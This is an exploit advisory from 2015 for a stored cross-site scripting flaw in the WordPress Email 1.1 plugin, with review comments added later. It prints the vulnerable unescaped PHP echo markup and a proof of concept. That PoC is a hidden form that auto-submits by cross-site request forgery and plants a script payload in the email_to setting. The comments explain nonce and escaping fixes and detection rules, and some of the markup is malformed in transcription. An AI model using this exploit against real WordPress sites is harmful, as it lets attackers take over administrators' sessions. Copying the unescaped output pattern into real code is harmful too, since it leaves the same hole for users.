######################
# Exploit Title : Wordpress Email 1.1 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/email/
# Software Link : https://downloads.wordpress.org/plugin/email.1.1.zip
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
# Vulnerable code :
<!-- Review note: the inputs below print their id/name/value with a bare PHP echo.
     The second input is shown as it renders once a stored payload is present: the
     attribute value is not escaped, so a value of the form "/><script>…" closes
     the attribute and the tag. The fix belongs in the plugin, not the markup:
     sanitize on save (sanitize_text_field()/is_email() as appropriate) and escape
     on output with esc_attr(). The label's $email_fromPname versus the input's
     $email_from_name looks like a transcription error in the advisory rather than
     the plugin's own source (unverified from this page). -->
<tr valign="top">
<th scope="row"><label for="<?php echo $email_fromPname; ?>">From</label></th>
<td>
<input type="text" id="<?php echo $email_from_name; ?>" name="<?php echo $email_from_name; ?>" style="width: 25%" value="<?php echo get_bloginfo( 'site_name' ); ?>" placeholder="The name in the From field">
<input type="text" id="<?php echo $email_from; ?>" name="<?php echo $email_from; ?>" style="width: 25%" value=/><script>alert(123)</script> placeholder="The email address to send from">
</td>
</tr>
#####################
Exploit Code:
<!-- Review note: this PoC is a cross-site request forgery that plants a stored XSS.
     The form is hidden (#test) and the script at the bottom submits it after 1 ms;
     the payload is the email_to value. The form carries no WordPress nonce field,
     so if it works as claimed the plugin's save handler neither verifies a nonce
     (check_admin_referer()/wp_verify_nonce()) nor escapes the stored value when it
     re-renders the settings page. Plugin-side fix: wp_nonce_field() in the settings
     form, check_admin_referer() plus a current_user_can() capability check before
     saving, and esc_attr() on output. Detection: settings-save POSTs whose
     Origin/Referer is not the site's own wp-admin, or stored option values
     containing "<script". The markup below is damaged in transcription and is
     left exactly as published. -->
<html>
<body>
<style>
#test{ display:none; }
</style>
<form name="send" method="post"<div id="test">
<table class="form-table">
<tbody>
<tr valign="top">
<select id="email_type" name="email_type">
<option val="post">post</option>
</select>
</td>
</tr>
<td>
<select id="email_action" name="email_action">
<option val="0">new</option>
</select>
</td>
</tr>
<td>
<input id="email_from_name" type="hidden"name="email_from_name" style="width: 25%" value="wordpress" placeholder="The name in the From field">
<input id="email_from" type="hidden" name="email_from"style="width: 25%" value="1@1.com" placeholder="The email address to send from">
</td>
</tr>
<td>
<select id="email_to_role" name="email_to_role"class="chosen-select select-role" data-placeholder="Choose a role (optional)" style="width: 25%">
<option></option>
</select>
<!-- the stored payload: an unescaped value that closes the attribute and tag -->
<input id="email_to" name="email_to"value='"><script>alert(1)</script>' style="width: 70%" placeholder="Additional email addresses">
</td>
</tr>
<td>
<select id="email_cc_role" name="email_cc_role"class="chosen-select select-role"
data-placeholder="Choose a role (optional)" style="width: 25%">
<option></option>
</select>
<input type="hidden" id="email_cc" name="email_cc"style="width: 70%" placeholder="Additional email addresses">
</td>
</tr>
<td>
<select id="email_bcc_role" name="email_bcc_role"class="chosen-select select-role" data-placeholder="Choose a role (optional)" style="width: 25%">
<option></option>
</select>
<input type="hidden" id="email_bcc" name="email_bcc"style="width: 70%" placeholder="Additional email addresses">
</td>
</tr>
<td>
<input type="hidden" name="email_subject" style="width: 50%" value="[[site_name]] [post_title] [action]">
Example: "[My Site] Hello World! updated"
</td>
</tr>
<td>
<div id="wp-email_message-wrap" class="wp-core-ui wp-editor-wrap html-active"><link rel='stylesheet' id='editor-buttons-css'href='http://localhost/wordpress/wp-includes/css/editor.min.css?ver=4.0' type="hidden" media='all' />
<div id="wp-email_message-editor-container" class="wp-editor-container"><textareaclass="wp-editor-area" rows="20" cols="40" name="email_message"id="email_message">1</textarea></div>
</div>
</td>
</tr>
<td>
<input type="hidden" name="email_hidden" value="Y">
</td>
</tr>
</form>
</div>
<!-- auto-submits the hidden form on load; this is the CSRF delivery step described in the note above -->
<script language="Javascript">
setTimeout('send.submit()', 1);
</script>
</form>
</body>
</html>